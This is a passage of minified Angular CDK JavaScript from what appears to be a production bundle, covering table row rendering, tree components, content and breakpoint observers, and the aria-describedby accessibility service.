i=this._rowOutlet.viewContainer;this._viewRepeater.applyChanges(e,i,(n,r,c)=>this._getEmbeddedViewArgs(n.item,c),n=>n.item.data,n=>{1===n.operation&&n.context&&this._renderCellTemplateForItem(n.record.item.rowDef,n.context)}),this._updateRowIndexContext(),e.forEachIdentityChange(n=>{i.get(n.currentIndex).context.$implicit=n.item.data}),this._updateNoDataRow(),this._ngZone&&qi.isInAngularZone()?this._ngZone.onStable.pipe(Cn(1),ea(this._onDestroy)).subscribe(()=>{this.updateStickyColumnStyles()}):this.updateStickyColumnStyles(),this.contentChanged.next()}addColumnDef(e){this._customColumnDefs.add(e)}removeColumnDef(e){this._customColumnDefs.delete(e)}addRowDef(e){this._customRowDefs.add(e)}removeRowDef(e){this._customRowDefs.delete(e)}addHeaderRowDef(e){this._customHeaderRowDefs.add(e),this._headerRowDefChanged=!0}removeHeaderRowDef(e){this._customHeaderRowDefs.delete(e),this._headerRowDefChanged=!0}addFooterRowDef(e){this._customFooterRowDefs.add(e),this._footerRowDefChanged=!0}removeFooterRowDef(e){this._customFooterRowDefs.delete(e),this._footerRowDefChanged=!0}setNoDataRow(e){this._customNoDataRow=e}updateStickyHeaderRowStyles(){const e=this._getRenderedRows(this._headerRowOutlet),n=this._elementRef.nativeElement.querySelector("thead");n&&(n.style.display=e.length?"":"none");const r=this._headerRowDefs.map(c=>c.sticky);this._stickyStyler.clearStickyPositioning(e,["top"]),this._stickyStyler.stickRows(e,r,"top"),this._headerRowDefs.forEach(c=>c.resetStickyChanged())}updateStickyFooterRowStyles(){const e=this._getRenderedRows(this._footerRowOutlet),n=this._elementRef.nativeElement.querySelector("tfoot");n&&(n.style.display=e.length?"":"none");const r=this._footerRowDefs.map(c=>c.sticky);this._stickyStyler.clearStickyPositioning(e,["bottom"]),this._stickyStyler.stickRows(e,r,"bottom"),this._stickyStyler.updateStickyFooterContainer(this._elementRef.nativeElement,r),this._footerRowDefs.forEach(c=>c.resetStickyChanged())}updateStickyColumnStyles(){const e=this._getRenderedRows(this._headerRowOutlet),i=this._getRenderedRows(this._rowOutlet),n=this._getRenderedRows(this._footerRowOutlet);(this._isNativeHtmlTable&&!this._fixedLayout||this._stickyColumnStylesNeedReset)&&(this._stickyStyler.clearStickyPositioning([...e,...i,...n],["left","right"]),this._stickyColumnStylesNeedReset=!1),e.forEach((r,c)=>{this._addStickyColumnStyles([r],this._headerRowDefs[c])}),this._rowDefs.forEach(r=>{const c=[];for(let d=0;d<i.length;d++)this._renderRows[d].rowDef===r&&c.push(i[d]);this._addStickyColumnStyles(c,r)}),n.forEach((r,c)=>{this._addStickyColumnStyles([r],this._footerRowDefs[c])}),Array.from(this._columnDefsByName.values()).forEach(r=>r.resetStickyChanged())}_getAllRenderRows(){const e=[],i=this._cachedRenderRowsMap;this._cachedRenderRowsMap=new Map;for(let n=0;n<this._data.length;n++){let r=this._data[n];const c=this._getRenderRowsForData(r,n,i.get(r));this._cachedRenderRowsMap.has(r)||this._cachedRenderRowsMap.set(r,new WeakMap);for(let d=0;d<c.length;d++){let T=c[d];const k=this._cachedRenderRowsMap.get(T.data);k.has(T.rowDef)?k.get(T.rowDef).push(T):k.set(T.rowDef,[T]),e.push(T)}}return e}_getRenderRowsForData(e,i,n){return this._getRowDefs(e,i).map(c=>{const d=n&&n.has(c)?n.get(c):[];if(d.length){const T=d.shift();return T.dataIndex=i,T}return{data:e,rowDef:c,dataIndex:i}})}_cacheColumnDefs(){this._columnDefsByName.clear(),R3(this._getOwnDefs(this._contentColumnDefs),this._customColumnDefs).forEach(i=>{this._columnDefsByName.has(i.name),this._columnDefsByName.set(i.name,i)})}_cacheRowDefs(){this._headerRowDefs=R3(this._getOwnDefs(this._contentHeaderRowDefs),this._customHeaderRowDefs),this._footerRowDefs=R3(this._getOwnDefs(this._contentFooterRowDefs),this._customFooterRowDefs),this._rowDefs=R3(this._getOwnDefs(this._contentRowDefs),this._customRowDefs);const e=this._rowDefs.filter(i=>!i.when);this._defaultRowDef=e[0]}_renderUpdatedColumns(){const e=(c,d)=>c||!!d.getColumnsDiff(),i=this._rowDefs.reduce(e,!1);i&&this._forceRenderDataRows();const n=this._headerRowDefs.reduce(e,!1);n&&this._forceRenderHeaderRows();const r=this._footerRowDefs.reduce(e,!1);return r&&this._forceRenderFooterRows(),i||n||r}_switchDataSource(e){this._data=[],f3(this.dataSource)&&this.dataSource.disconnect(this),this._renderChangeSubscription&&(this._renderChangeSubscription.unsubscribe(),this._renderChangeSubscription=null),e||(this._dataDiffer&&this._dataDiffer.diff([]),this._rowOutlet.viewContainer.clear()),this._dataSource=e}_observeRenderChanges(){if(!this.dataSource)return;let e;f3(this.dataSource)?e=this.dataSource.connect(this):Cm(this.dataSource)?e=this.dataSource:Array.isArray(this.dataSource)&&(e=Bi(this.dataSource)),this._renderChangeSubscription=e.pipe(ea(this._onDestroy)).subscribe(i=>{this._data=i||[],this.renderRows()})}_forceRenderHeaderRows(){this._headerRowOutlet.viewContainer.length>0&&this._headerRowOutlet.viewContainer.clear(),this._headerRowDefs.forEach((e,i)=>this._renderRow(this._headerRowOutlet,e,i)),this.updateStickyHeaderRowStyles()}_forceRenderFooterRows(){this._footerRowOutlet.viewContainer.length>0&&this._footerRowOutlet.viewContainer.clear(),this._footerRowDefs.forEach((e,i)=>this._renderRow(this._footerRowOutlet,e,i)),this.updateStickyFooterRowStyles()}_addStickyColumnStyles(e,i){const n=Array.from(i.columns||[]).map(d=>this._columnDefsByName.get(d)),r=n.map(d=>d.sticky),c=n.map(d=>d.stickyEnd);this._stickyStyler.updateStickyColumns(e,r,c,!this._fixedLayout||this._forceRecalculateCellWidths)}_getRenderedRows(e){const i=[];for(let n=0;n<e.viewContainer.length;n++){const r=e.viewContainer.get(n);i.push(r.rootNodes[0])}return i}_getRowDefs(e,i){if(1==this._rowDefs.length)return[this._rowDefs[0]];let n=[];if(this.multiTemplateDataRows)n=this._rowDefs.filter(r=>!r.when||r.when(i,e));else{let r=this._rowDefs.find(c=>c.when&&c.when(i,e))||this._defaultRowDef;r&&n.push(r)}return n}_getEmbeddedViewArgs(e,i){return{templateRef:e.rowDef.template,context:{$implicit:e.data},index:i}}_renderRow(e,i,n,r={}){const c=e.viewContainer.createEmbeddedView(i.template,r,n);return this._renderCellTemplateForItem(i,r),c}_renderCellTemplateForItem(e,i){for(let n of this._getCellTemplates(e))Lh.mostRecentCellOutlet&&Lh.mostRecentCellOutlet._viewContainer.createEmbeddedView(n,i);this._changeDetectorRef.markForCheck()}_updateRowIndexContext(){const e=this._rowOutlet.viewContainer;for(let i=0,n=e.length;i<n;i++){const c=e.get(i).context;c.count=n,c.first=0===i,c.last=i===n-1,c.even=i%2==0,c.odd=!c.even,this.multiTemplateDataRows?(c.dataIndex=this._renderRows[i].dataIndex,c.renderIndex=i):c.index=this._renderRows[i].dataIndex}}_getCellTemplates(e){return e&&e.columns?Array.from(e.columns,i=>{const n=this._columnDefsByName.get(i);return e.extractCellTemplate(n)}):[]}_applyNativeTableSections(){const e=this._document.createDocumentFragment(),i=[{tag:"thead",outlets:[this._headerRowOutlet]},{tag:"tbody",outlets:[this._rowOutlet,this._noDataRowOutlet]},{tag:"tfoot",outlets:[this._footerRowOutlet]}];for(const n of i){const r=this._document.createElement(n.tag);r.setAttribute("role","rowgroup");for(const c of n.outlets)r.appendChild(c.elementRef.nativeElement);e.appendChild(r)}this._elementRef.nativeElement.appendChild(e)}_forceRenderDataRows(){this._dataDiffer.diff([]),this._rowOutlet.viewContainer.clear(),this.renderRows()}_checkStickyStates(){const e=(i,n)=>i||n.hasStickyChanged();this._headerRowDefs.reduce(e,!1)&&this.updateStickyHeaderRowStyles(),this._footerRowDefs.reduce(e,!1)&&this.updateStickyFooterRowStyles(),Array.from(this._columnDefsByName.values()).reduce(e,!1)&&(this._stickyColumnStylesNeedReset=!0,this.updateStickyColumnStyles())}_setupStickyStyler(){this._stickyStyler=new bfe(this._isNativeHtmlTable,this.stickyCssClass,this._dir?this._dir.value:"ltr",this._coalescedStyleScheduler,this._platform.isBrowser,this.needsPositionStickyOnElement,this._stickyPositioningListener),(this._dir?this._dir.change:Bi()).pipe(ea(this._onDestroy)).subscribe(i=>{this._stickyStyler.direction=i,this.updateStickyColumnStyles()})}_getOwnDefs(e){return e.filter(i=>!i._table||i._table===this)}_updateNoDataRow(){const e=this._customNoDataRow||this._noDataRow;if(!e)return;const i=0===this._rowOutlet.viewContainer.length;if(i===this._isShowingNoDataRow)return;const n=this._noDataRowOutlet.viewContainer;if(i){const r=n.createEmbeddedView(e.templateRef),c=r.rootNodes[0];1===r.rootNodes.length&&(null==c?void 0:c.nodeType)===this._document.ELEMENT_NODE&&(c.setAttribute("role","row"),c.classList.add(e._contentClassName))}else n.clear();this._isShowingNoDataRow=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(yd),Ee(Ma),Ee(mi),Vr("role"),Ee(Cr,8),Ee(ga),Ee(cr),Ee(Ny),Ee(gw),Ee(bm),Ee(vw,12),Ee(qi,8))},t.\u0275cmp=Wt({type:t,selectors:[["cdk-table"],["table","cdk-table",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,T3,5),fa(n,Nh,5),fa(n,A3,5),fa(n,Uy,5),fa(n,qy,5)),2&e){let r;Vt(r=Bt())&&(i._noDataRow=r.first),Vt(r=Bt())&&(i._contentColumnDefs=r),Vt(r=Bt())&&(i._contentRowDefs=r),Vt(r=Bt())&&(i._contentHeaderRowDefs=r),Vt(r=Bt())&&(i._contentFooterRowDefs=r)}},viewQuery:function(e,i){if(1&e&&(Mi(E3,7),Mi(D3,7),Mi(x3,7),Mi(w3,7)),2&e){let n;Vt(n=Bt())&&(i._rowOutlet=n.first),Vt(n=Bt())&&(i._headerRowOutlet=n.first),Vt(n=Bt())&&(i._footerRowOutlet=n.first),Vt(n=Bt())&&(i._noDataRowOutlet=n.first)}},hostAttrs:[1,"cdk-table"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("cdk-table-fixed-layout",i.fixedLayout)},inputs:{trackBy:"trackBy",dataSource:"dataSource",multiTemplateDataRows:"multiTemplateDataRows",fixedLayout:"fixedLayout"},outputs:{contentChanged:"contentChanged"},exportAs:["cdkTable"],features:[ki([{provide:k1,useExisting:t},{provide:Ny,useClass:gz},{provide:gw,useClass:xz},{provide:vw,useValue:null}])],ngContentSelectors:dfe,decls:6,vars:0,consts:[["headerRowOutlet",""],["rowOutlet",""],["noDataRowOutlet",""],["footerRowOutlet",""]],template:function(e,i){1&e&&(Jn(lfe),va(0),va(1,1),Ir(2,0)(3,1)(4,2)(5,3))},dependencies:[E3,D3,x3,w3],styles:[".cdk-table-fixed-layout{table-layout:fixed}"],encapsulation:2}),t})();function R3(t,a){return t.concat(Array.from(a))}let Aw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Hy]}),t})();class Rz extends class vfe{constructor(){this.expansionModel=new I1(!0)}toggle(a){this.expansionModel.toggle(this._trackByValue(a))}expand(a){this.expansionModel.select(this._trackByValue(a))}collapse(a){this.expansionModel.deselect(this._trackByValue(a))}isExpanded(a){return this.expansionModel.isSelected(this._trackByValue(a))}toggleDescendants(a){this.expansionModel.isSelected(this._trackByValue(a))?this.collapseDescendants(a):this.expandDescendants(a)}collapseAll(){this.expansionModel.clear()}expandDescendants(a){let e=[a];e.push(...this.getDescendants(a)),this.expansionModel.select(...e.map(i=>this._trackByValue(i)))}collapseDescendants(a){let e=[a];e.push(...this.getDescendants(a)),this.expansionModel.deselect(...e.map(i=>this._trackByValue(i)))}_trackByValue(a){return this.trackBy?this.trackBy(a):a}}{constructor(a,e){super(),this.getChildren=a,this.options=e,this.options&&(this.trackBy=this.options.trackBy)}expandAll(){this.expansionModel.clear();const a=this.dataNodes.reduce((e,i)=>[...e,...this.getDescendants(i),i],[]);this.expansionModel.select(...a.map(e=>this._trackByValue(e)))}getDescendants(a){const e=[];return this._getDescendants(e,a),e.splice(1)}_getDescendants(a,e){a.push(e);const i=this.getChildren(e);Array.isArray(i)?i.forEach(n=>this._getDescendants(a,n)):Cm(i)&&i.pipe(Cn(1),Dn(Boolean)).subscribe(n=>{for(const r of n)this._getDescendants(a,r)})}}const S3=new ni("CDK_TREE_NODE_OUTLET_NODE");let Gy=(()=>{class t{constructor(e,i){this.viewContainer=e,this._node=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(S3,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkTreeNodeOutlet",""]]}),t})();class Afe{constructor(a){this.$implicit=a}}let k3=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkTreeNodeDef",""]],inputs:{when:["cdkTreeNodeDefWhen","when"]}}),t})(),zh=(()=>{class t{constructor(e,i){this._differs=e,this._changeDetectorRef=i,this._onDestroy=new J,this._levels=new Map,this.viewChange=new zs({start:0,end:Number.MAX_VALUE})}get dataSource(){return this._dataSource}set dataSource(e){this._dataSource!==e&&this._switchDataSource(e)}ngOnInit(){this._dataDiffer=this._differs.find([]).create(this.trackBy)}ngOnDestroy(){this._nodeOutlet.viewContainer.clear(),this.viewChange.complete(),this._onDestroy.next(),this._onDestroy.complete(),this._dataSource&&"function"==typeof this._dataSource.disconnect&&this.dataSource.disconnect(this),this._dataSubscription&&(this._dataSubscription.unsubscribe(),this._dataSubscription=null)}ngAfterContentChecked(){const e=this._nodeDefs.filter(i=>!i.when);this._defaultNodeDef=e[0],this.dataSource&&this._nodeDefs&&!this._dataSubscription&&this._observeRenderChanges()}_switchDataSource(e){this._dataSource&&"function"==typeof this._dataSource.disconnect&&this.dataSource.disconnect(this),this._dataSubscription&&(this._dataSubscription.unsubscribe(),this._dataSubscription=null),e||this._nodeOutlet.viewContainer.clear(),this._dataSource=e,this._nodeDefs&&this._observeRenderChanges()}_observeRenderChanges(){let e;f3(this._dataSource)?e=this._dataSource.connect(this):Cm(this._dataSource)?e=this._dataSource:Array.isArray(this._dataSource)&&(e=Bi(this._dataSource)),e&&(this._dataSubscription=e.pipe(ea(this._onDestroy)).subscribe(i=>this.renderNodeChanges(i)))}renderNodeChanges(e,i=this._dataDiffer,n=this._nodeOutlet.viewContainer,r){const c=i.diff(e);!c||(c.forEachOperation((d,T,k)=>{if(null==d.previousIndex)this.insertNode(e[k],k,n,r);else if(null==k)n.remove(T),this._levels.delete(d.item);else{const q=n.get(T);n.move(q,k)}}),this._changeDetectorRef.detectChanges())}_getNodeDef(e,i){return 1===this._nodeDefs.length?this._nodeDefs.first:this._nodeDefs.find(r=>r.when&&r.when(i,e))||this._defaultNodeDef}insertNode(e,i,n,r){const c=this._getNodeDef(e,i),d=new Afe(e);d.level=this.treeControl.getLevel?this.treeControl.getLevel(e):void 0!==r&&this._levels.has(r)?this._levels.get(r)+1:0,this._levels.set(e,d.level),(n||this._nodeOutlet.viewContainer).createEmbeddedView(c.template,d,i),hu.mostRecentTreeNode&&(hu.mostRecentTreeNode.data=e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(yd),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["cdk-tree"]],contentQueries:function(e,i,n){if(1&e&&fa(n,k3,5),2&e){let r;Vt(r=Bt())&&(i._nodeDefs=r)}},viewQuery:function(e,i){if(1&e&&Mi(Gy,7),2&e){let n;Vt(n=Bt())&&(i._nodeOutlet=n.first)}},hostAttrs:["role","tree",1,"cdk-tree"],inputs:{dataSource:"dataSource",treeControl:"treeControl",trackBy:"trackBy"},exportAs:["cdkTree"],decls:1,vars:0,consts:[["cdkTreeNodeOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Gy],encapsulation:2}),t})(),hu=(()=>{class t{constructor(e,i){this._elementRef=e,this._tree=i,this._destroyed=new J,this._dataChanges=new J,t.mostRecentTreeNode=this,this.role="treeitem"}get role(){return"treeitem"}set role(e){this._elementRef.nativeElement.setAttribute("role",e)}get data(){return this._data}set data(e){e!==this._data&&(this._data=e,this._setRoleFromData(),this._dataChanges.next())}get isExpanded(){return this._tree.treeControl.isExpanded(this._data)}get level(){return this._tree.treeControl.getLevel?this._tree.treeControl.getLevel(this._data):this._parentNodeAriaLevel}ngOnInit(){this._parentNodeAriaLevel=function Tfe(t){let a=t.parentElement;for(;a&&!Efe(a);)a=a.parentElement;return a?a.classList.contains("cdk-nested-tree-node")?Uo(a.getAttribute("aria-level")):0:-1}(this._elementRef.nativeElement),this._elementRef.nativeElement.setAttribute("aria-level",`${this.level+1}`)}ngOnDestroy(){t.mostRecentTreeNode===this&&(t.mostRecentTreeNode=null),this._dataChanges.complete(),this._destroyed.next(),this._destroyed.complete()}focus(){this._elementRef.nativeElement.focus()}_setRoleFromData(){this.role="treeitem"}}return t.mostRecentTreeNode=null,t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(zh))},t.\u0275dir=Ot({type:t,selectors:[["cdk-tree-node"]],hostAttrs:[1,"cdk-tree-node"],hostVars:1,hostBindings:function(e,i){2&e&&Rt("aria-expanded",i.isExpanded)},inputs:{role:"role"},exportAs:["cdkTreeNode"]}),t})();function Efe(t){const a=t.classList;return!(!(null==a?void 0:a.contains("cdk-nested-tree-node"))&&!(null==a?void 0:a.contains("cdk-tree")))}let Tw=(()=>{class t extends hu{constructor(e,i,n){super(e,i),this._differs=n}ngAfterContentInit(){this._dataDiffer=this._differs.find([]).create(this._tree.trackBy);const e=this._tree.treeControl.getChildren(this.data);Array.isArray(e)?this.updateChildrenNodes(e):Cm(e)&&e.pipe(ea(this._destroyed)).subscribe(i=>this.updateChildrenNodes(i)),this.nodeOutlet.changes.pipe(ea(this._destroyed)).subscribe(()=>this.updateChildrenNodes())}ngOnInit(){super.ngOnInit()}ngOnDestroy(){this._clear(),super.ngOnDestroy()}updateChildrenNodes(e){const i=this._getNodeOutlet();e&&(this._children=e),i&&this._children?this._tree.renderNodeChanges(this._children,this._dataDiffer,i.viewContainer,this._data):this._dataDiffer.diff([])}_clear(){const e=this._getNodeOutlet();e&&(e.viewContainer.clear(),this._dataDiffer.diff([]))}_getNodeOutlet(){const e=this.nodeOutlet;return e&&e.find(i=>!i._node||i._node===this)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(zh),Ee(yd))},t.\u0275dir=Ot({type:t,selectors:[["cdk-nested-tree-node"]],contentQueries:function(e,i,n){if(1&e&&fa(n,Gy,5),2&e){let r;Vt(r=Bt())&&(i.nodeOutlet=r)}},hostAttrs:[1,"cdk-nested-tree-node"],inputs:{role:"role",disabled:"disabled",tabIndex:"tabIndex"},exportAs:["cdkNestedTreeNode"],features:[ki([{provide:hu,useExisting:t},{provide:S3,useExisting:t}]),ci]}),t})(),Dw=(()=>{class t{constructor(e,i){this._tree=e,this._treeNode=i,this._recursive=!1}get recursive(){return this._recursive}set recursive(e){this._recursive=wi(e)}_toggle(e){this.recursive?this._tree.treeControl.toggleDescendants(this._treeNode.data):this._tree.treeControl.toggle(this._treeNode.data),e.stopPropagation()}}return t.\u0275fac=function(e){return new(e||t)(Ee(zh),Ee(hu))},t.\u0275dir=Ot({type:t,selectors:[["","cdkTreeNodeToggle",""]],hostBindings:function(e,i){1&e&&he("click",function(r){return i._toggle(r)})},inputs:{recursive:["cdkTreeNodeToggleRecursive","recursive"]}}),t})(),xw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();function es(t,...a){return a.length?a.some(e=>t[e]):t.altKey||t.shiftKey||t.ctrlKey||t.metaKey}function lp(t,a=Vy){return Ie((e,i)=>{let n=null,r=null,c=null;const d=()=>{if(n){n.unsubscribe(),n=null;const k=r;r=null,i.next(k)}};function T(){const k=c+t,q=a.now();if(q<k)return n=this.schedule(void 0,k-q),void i.add(n);d()}e.subscribe(Ae(i,k=>{r=k,c=a.now(),n||(n=a.schedule(T,t),i.add(n))},()=>{d(),i.complete()},void 0,()=>{r=n=null}))})}function Sw(t){return Dn((a,e)=>t<=e)}function Bh(t,a=A){return t=null!=t?t:Ffe,Ie((e,i)=>{let n,r=!0;e.subscribe(Ae(i,c=>{const d=a(c);(r||!t(n,d))&&(r=!1,n=d,i.next(c))}))})}function Ffe(t,a){return t===a}let Pz=(()=>{class t{create(e){return"undefined"==typeof MutationObserver?null:new MutationObserver(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Vfe=(()=>{class t{constructor(e){this._mutationObserverFactory=e,this._observedElements=new Map}ngOnDestroy(){this._observedElements.forEach((e,i)=>this._cleanupObserver(i))}observe(e){const i=Gr(e);return new G(n=>{const c=this._observeElement(i).subscribe(n);return()=>{c.unsubscribe(),this._unobserveElement(i)}})}_observeElement(e){if(this._observedElements.has(e))this._observedElements.get(e).count++;else{const i=new J,n=this._mutationObserverFactory.create(r=>i.next(r));n&&n.observe(e,{characterData:!0,childList:!0,subtree:!0}),this._observedElements.set(e,{observer:n,stream:i,count:1})}return this._observedElements.get(e).stream}_unobserveElement(e){this._observedElements.has(e)&&(this._observedElements.get(e).count--,this._observedElements.get(e).count||this._cleanupObserver(e))}_cleanupObserver(e){if(this._observedElements.has(e)){const{observer:i,stream:n}=this._observedElements.get(e);i&&i.disconnect(),n.complete(),this._observedElements.delete(e)}}}return t.\u0275fac=function(e){return new(e||t)(At(Pz))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),P3=(()=>{class t{constructor(e,i,n){this._contentObserver=e,this._elementRef=i,this._ngZone=n,this.event=new Tt,this._disabled=!1,this._currentSubscription=null}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e),this._disabled?this._unsubscribe():this._subscribe()}get debounce(){return this._debounce}set debounce(e){this._debounce=Uo(e),this._subscribe()}ngAfterContentInit(){!this._currentSubscription&&!this.disabled&&this._subscribe()}ngOnDestroy(){this._unsubscribe()}_subscribe(){this._unsubscribe();const e=this._contentObserver.observe(this._elementRef);this._ngZone.runOutsideAngular(()=>{this._currentSubscription=(this.debounce?e.pipe(lp(this.debounce)):e).subscribe(this.event)})}_unsubscribe(){var e;null===(e=this._currentSubscription)||void 0===e||e.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Vfe),Ee(mi),Ee(qi))},t.\u0275dir=Ot({type:t,selectors:[["","cdkObserveContent",""]],inputs:{disabled:["cdkObserveContentDisabled","disabled"],debounce:"debounce"},outputs:{event:"cdkObserveContent"},exportAs:["cdkObserveContent"]}),t})(),$y=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[Pz]}),t})();const Oz=new Set;let N1,Bfe=(()=>{class t{constructor(e){this._platform=e,this._matchMedia=this._platform.isBrowser&&window.matchMedia?window.matchMedia.bind(window):Ufe}matchMedia(e){return(this._platform.WEBKIT||this._platform.BLINK)&&function Hfe(t){if(!Oz.has(t))try{N1||(N1=document.createElement("style"),N1.setAttribute("type","text/css"),document.head.appendChild(N1)),N1.sheet&&(N1.sheet.insertRule(`@media ${t} {body{ }}`,0),Oz.add(t))}catch(a){console.error(a)}}(e),this._matchMedia(e)}}return t.\u0275fac=function(e){return new(e||t)(At(cr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Ufe(t){return{matches:"all"===t||""===t,media:t,addListener:()=>{},removeListener:()=>{}}}let O3=(()=>{class t{constructor(e,i){this._mediaMatcher=e,this._zone=i,this._queries=new Map,this._destroySubject=new J}ngOnDestroy(){this._destroySubject.next(),this._destroySubject.complete()}isMatched(e){return Nz(Oy(e)).some(n=>this._registerQuery(n).mql.matches)}observe(e){let r=mg(Nz(Oy(e)).map(c=>this._registerQuery(c).observable));return r=ug(r.pipe(Cn(1)),r.pipe(Sw(1),lp(0))),r.pipe(Xe(c=>{const d={matches:!1,breakpoints:{}};return c.forEach(({matches:T,query:k})=>{d.matches=d.matches||T,d.breakpoints[k]=T}),d}))}_registerQuery(e){if(this._queries.has(e))return this._queries.get(e);const i=this._mediaMatcher.matchMedia(e),r={observable:new G(c=>{const d=T=>this._zone.run(()=>c.next(T));return i.addListener(d),()=>{i.removeListener(d)}}).pipe(Ro(i),Xe(({matches:c})=>({query:e,matches:c})),ea(this._destroySubject)),mql:i};return this._queries.set(e,r),r}}return t.\u0275fac=function(e){return new(e||t)(At(Bfe),At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Nz(t){return t.map(a=>a.split(",")).reduce((a,e)=>a.concat(e)).map(a=>a.trim())}function N3(t,a){return(t.getAttribute(a)||"").match(/\S+/g)||[]}const Wz="cdk-describedby-message",L3="cdk-describedby-host";let kw=0,Pw=(()=>{class t{constructor(e,i){this._platform=i,this._messageRegistry=new Map,this._messagesContainer=null,this._id=""+kw++,this._document=e,this._id=Po(h1)+"-"+kw++}describe(e,i,n){if(!this._canBeDescribed(e,i))return;const r=Ow(i,n);"string"!=typeof i?(Fz(i,this._id),this._messageRegistry.set(r,{messageElement:i,referenceCount:0})):this._messageRegistry.has(r)||this._createMessageElement(i,n),this._isElementDescribedByMessage(e,r)||this._addMessageReference(e,r)}removeDescription(e,i,n){var r;if(!i||!this._isElementNode(e))return;const c=Ow(i,n);if(this._isElementDescribedByMessage(e,c)&&this._removeMessageReference(e,c),"string"==typeof i){const d=this._messageRegistry.get(c);d&&0===d.referenceCount&&this._deleteMessageElement(c)}0===(null===(r=this._messagesContainer)||void 0===r?void 0:r.childNodes.length)&&(this._messagesContainer.remove(),this._messagesContainer=null)}ngOnDestroy(){var e;const i=this._document.querySelectorAll(`[${L3}="${this._id}"]`);for(let n=0;n<i.length;n++)this._removeCdkDescribedByReferenceIds(i[n]),i[n].removeAttribute(L3);null===(e=this._messagesContainer)||void 0===e||e.remove(),this._messagesContainer=null,this._messageRegistry.clear()}_createMessageElement(e,i){const n=this._document.createElement("div");Fz(n,this._id),n.textContent=e,i&&n.setAttribute("role",i),this._createMessagesContainer(),this._messagesContainer.appendChild(n),this._messageRegistry.set(Ow(e,i),{messageElement:n,referenceCount:0})}_deleteMessageElement(e){var i,n;null===(n=null===(i=this._messageRegistry.get(e))||void 0===i?void 0:i.messageElement)||void 0===n||n.remove(),this._messageRegistry.delete(e)}_createMessagesContainer(){if(this._messagesContainer)return;const e="cdk-describedby-message-container",i=this._document.querySelectorAll(`.${e}[platform="server"]`);for(let r=0;r<i.length;r++)i[r].remove();const n=this._document.createElement("div");n.style.visibility="hidden",n.classList.add(e),n.classList.add("cdk-visually-hidden"),this._platform&&!this._platform.isBrowser&&n.setAttribute("platform","server"),this._document.body.appendChild(n),this._messagesContainer=n}_removeCdkDescribedByReferenceIds(e){const i=N3(e,"aria-describedby").filter(n=>0!=n.indexOf(Wz));e.setAttribute("aria-describedby",i.join(" "))}_addMessageReference(e,i){const n=this._messageRegistry.get(i);(function qfe(t,a,e){const i=N3(t,a);i.some(n=>n.trim()==e.trim())||(i.push(e.trim()),t.setAttribute(a,i.join(" ")))})(e,"aria-describedby",n.messageElement.id),e.setAttribute(L3,this._id),n.referenceCount++}_removeMessageReference(e,i){const n=this._messageRegistry.get(i);n.referenceCount--,function Gfe(t,a,e){const n=N3(t,a).filter(r=>r!=e.trim());n.length?t.setAttribute(a,n.join(" ")):t.removeAttribute(a)}(e,"aria-describedby",n.messageElement.id),e.removeAttribute(L3)}_isElementDescribedByMessage(e,i){const n=N3(e,"aria-describedby"),r=this._messageRegistry.get(i),c=r&&r.messageElement.id;return!!c&&-1!=n.indexOf(c)}_canBeDescribed(e,i){if(!this._isElementNode(e))return!1;if(i&&"object"==typeof i)return!0;const n=null==i?"":`${i}`.trim(),r=e.getAttribute("aria-label");return!(!n||r&&r.trim()===n)}_isElementNode(e){return e.nodeType===this._document.ELEMENT_NODE}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(cr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Ow(t,a){return"string"==typeof t?`${a||""}/${t}`:t}function Fz(t,a){t.id||(t.id=`${Wz}-${a}-${kw++}`)}class Vz{constructor(a){this._items=a,this._activeItemIndex=-1,this._activeItem=null,this._wrap=!1,this._letterKeyStream=new J,this._typeaheadSubscription=I.EMPTY,this._vertical=!0,this._allowedModifierKeys=[],this._homeAndEnd=!1,this._skipPredicateFn=e=>e.disabled,this._pressedLetters=[],this.tabOut=new J,this.change=new J,a instanceof Cd&&a.changes.subscribe(e=>{if(this._activeItem){const n=e.toArray().indexOf(this._activeItem);n>-1&&n!==this._activeItemIndex&&(this._activeItemIndex=n)}})}skipPredicate(a){return this._skipPredicateFn=a,this}withWrap(a=!0){return this._wrap=a,this}withVerticalOrientation(a=!0){return this._vertical=a,this}withHorizontalOrientation(a){return this._horizontal=a,this}withAllowedModifierKeys(a){return this._allowedModifierKeys=a,this}withTypeAhead(a=200){return this._typeaheadSubscription.unsubscribe(),this._typeaheadSubscription=this._letterKeyStream.pipe(qr(e=>this._pressedLetters.push(e)),lp(a),Dn(()=>this._pressedLetters.length>0),Xe(()=>this._pressedLetters.join(""))).subscribe(e=>{const i=this._getItemsArray();for(let n=1;n<i.length+1;n++){const r=(this._activeItemIndex+n)%i.length,c=i[r];if(!this._skipPredicateFn(c)&&0===c.getLabel().toUpperCase().trim().indexOf(e)){this.setActiveItem(r);break}}this._pressedLetters=[]}),this}withHomeAndEnd(a=!0){return this._homeAndEnd=a,this}setActiveItem(a){const 